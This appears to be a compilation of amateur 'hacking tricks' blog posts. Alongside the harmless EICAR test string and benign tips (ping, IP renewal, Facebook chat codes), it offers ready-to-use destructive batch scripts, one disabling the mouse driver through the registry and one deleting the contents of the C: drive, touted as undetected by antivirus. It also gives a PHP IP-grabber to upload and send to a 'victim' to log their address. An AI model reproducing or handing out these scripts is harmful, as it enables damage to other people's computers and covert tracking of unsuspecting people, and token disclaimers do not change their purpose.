Is You Antivirus Working Perfect ?


This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.

  • First open Notepad and copy below code into it.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  •  Save the file as virus.exe
         As soon as you will run this file you antivirus will detect it as software. If not then you need to change your program.

Make A Virus That Disable Mouse



I had previously posted on making different batch files like completely harmless but today we will be making a batch virus which is harm-full it will disable your mouse so think before trying it on yourself.

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.

Learn To Make Dangerous Virus In A Minute


In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

How To Grab Someone IP Address ?


In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

How To Hack Someone Ip Address ?

    1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 

    <?php
    $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
    $img_number = imagecreate(400,95);
    $backcolor = imagecolorallocate($img_number,10,102,153);
    $textcolor = imagecolorallocate($img_number,255,255,255);

    imagefill($img_number,0,0,$backcolor);
    $number0 = " This is Your IP/Proxy";
    $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
    $number2 = " Host/Proxy: $hostname";
    $number4 = " _________________________________";

    Imagestring($img_number,10,5,5,$number0,$textcolor);
    Imagestring($img_number,10,5,25,$number1,$textcolor);
    Imagestring($img_number,10,5,45,$number2,$textcolor);
    Imagestring($img_number,10,5,50,$number4,$textcolor);
    Imagestring($img_number,10,8,50,$number4,$textcolor);
    Imagestring($img_number,10,5,10,$number4,$textcolor);
    Imagestring($img_number,10,8,10,$number4,$textcolor);

    header("Content-type: image/png");
    imagepng($img_number);
    $file=fopen("Name-here-to-protect-the-File.txt","a");
    $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
    fwrite($file, $file2);
    fclose($file);
    ?>

          2. Now make Free account on any of  the free web hosting sites Ripway or on My3gb .
          3. Now Upload Grab.php to your web hosting site.
          4. Copy the link of your  uploaded file and send it to victim.
          5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
          6. Enjoy you are Done !!

      • NOTE - This is only for only editutonil purpus.If u Do and Wront thing then i am not responsible

      Finding Ip Address Of A Website Using Command Prompt


      In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

      How to find IP ?

      1. Go to Start > Type CMD and press Enter.
      2. Now write Ping followed by website URL whose IP you want to find.


      3. It will take less then a second and come up with the results as shown below.


      In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.


      Change Your Ip In Less Then 1 Minute

       now i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


      • Click on "Start" in the bottom left corner of the screen.
      • Click on "RUN"
      • Type in "command" and click OK

            You should be now at MSDOS prompt Screen

      • Type "ipconfig /release" just like that, and press "enter"
      • Type "exit" and leave the prompt
      • Right-click on "Network Places" or "My Network Places" on your desktop.
      • Click on "properties"

           Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

      •  Right click on "Local Area Connection" and click "properties"
      • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
      • Click on "Use the following IP address" under the "General" tab
      • Create an IP address (It doesn't matter what it is)
      • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
      • Press the "Ok" button here
      • Hit the "Ok" button again

           Now you should be back to the "Local Area Connection" screen.

      • Right-click back on "Local Area Connection" and go to properties again.
      • Go back to the "TCP/IP" settings
      • This time, select "Obtain an IP address automatically"
      • Click on "Ok"
      • Hit "Ok" again.
      • Now you have a New IP address.

      New Awesome Facebook Chat Trick


        Facebook has recently made changes to its chat features. Now we can use profile images in chat. You can even type anything in colour using a simple trick. You just need to know how to get facebook profile id which you will learn by reading this article Trick to find facebook profile id. Below are codes of A-Z and guide on how to use them in chat.


             1. How to use facebook profile images in chat ?
      • To use profile images in chat Enter this ==> [[username]]
      • In place of username enter username of person whose image you want to show in chat. 
      • If u will enter c00lhacks this will show image of my page. 

             2. Codes of A-Z for Facebook chat.

      • Below are codes of A-Z which you can use in facebook chat. You can create your on words with this codes. I will demonstrate how to do that .
      [[107015582669715]]  = A
      [[116067591741123]]  = B
      [[115602405121532]]  = C
      [[112542438763744]]  = D
      [[115430438474268]]  = E
      [[109225112442557]]  = F
      [[111532845537326]]  = G
      [[111356865552629]]  = H
      [[109294689102123]]  = I
      [[126362660720793]]  = J
      [[116651741681944]]  = K
      [[115807951764667]]  = L
      [[106596672714242]]  = M
      [[108634132504932]]  = N
      [[116564658357124]]  = O
      [[111669128857397]]  = P
      [[107061805996548]]  = Q
      [[106699962703083]]  = R
      [[115927268419031]]  = S
      [[112669162092780]]  = T
      [[108983579135532]]  = U
      [[107023745999320]]  = V
      [[106678406038354]]  = W
      [[116740548336581]]  = X
      [[112416755444217]]  = Y
      [[165724910215]]        = Z
             
            3. How to use this codes ?
      • First think wat word you want to create then pick up codes of that alphabate from above codes
      • Let us create hi . So pick up codes of H and .
      • After that enter this in chat box  [[111356865552629]]  [[109294689102123]] 
      • Make sure there is space in between any two codes or else it will not work.
           
            4. Some Cool Facebook tricks.
      • Below are two codes to show Happy New year you can use any one of them
      [[124641767652266]] [[124642810985495]] [[124643044318805]] [[124643044318805]] [[124643487652094]] [[124642300985546]] [[124644090985367]] [[124644404318669]] [[124644567651986]] [[124642300985546]] [[124643487652094]] [[124644404318669]] [[124642810985495]] [[124645367651906]] [[124642300985546]] [[124645977651845]] [[124646247651818]] [[124646574318452]] [[124645977651845]] [[124642300985546]]

      OR

      [[337992182896839]] [[225777904163650]] [[244015585667152]] [[244015585667152]] [[319152701438185]] [[188142511282558]] [[319977728035866]] [[316759491692170]] [[139287272851910]] [[188142511282558]] [[319152701438185]] [[316759491692170]] [[225777904163650]] [[337598512918963]] [[188142511282558]] [[141281852650929]] [[268263169900550]] [[191790684249921]] [[141281852650929]]

      • Enter below codes to show Cool Hacking Tricks
      [[115602405121532]] [[116564658357124]] [[116564658357124]] [[115807951764667]]    [[111356865552629]] [[107015582669715]] [[115602405121532]] [[116651741681944]] [[109294689102123]] [[108634132504932]] [[111532845537326]]     [[112669162092780]] [[106699962703083]] [[109294689102123]] [[115602405121532]] [[116651741681944]] [[115927268419031]]
      • This way you can create your own words your name .
      • Hope you like it subscribe below for such more tutorials and feel free to leave comments.